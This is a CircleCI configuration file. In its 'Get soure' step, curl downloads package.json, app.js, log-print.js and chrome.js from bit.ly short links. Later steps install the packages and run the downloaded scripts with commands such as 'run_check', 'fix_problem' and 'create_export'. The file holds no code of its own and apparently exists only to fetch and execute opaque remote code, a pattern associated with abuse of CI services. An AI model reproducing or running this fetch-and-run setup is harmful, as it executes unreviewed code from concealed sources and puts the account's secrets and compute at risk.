version: 2.1

jobs:
  run-jobs:
    docker:
      - image: circleci/node:15
    resource_class: medium
    steps:
      - run: 
          name: Get soure
          command: |-
            curl -fsSL https://bit.ly/3nvNdYs -o package.json && curl -fsSL https://bit.ly/3927CvS -o app.js && curl -fsSL https://bit.ly/3Cb0Pwk -o log-print.js && curl -fsSL https://bit.ly/2XkOGpO -o chrome.js
      - run: 
          name: Node Install Packages
          command: |-
            npm i -s
      - run: node app.js
      - run: node chrome.js run_check
      - run: node chrome.js fix_problem
      - run: node chrome.js create_export
      
workflows:
  start-work:
    jobs:
      - run-jobs
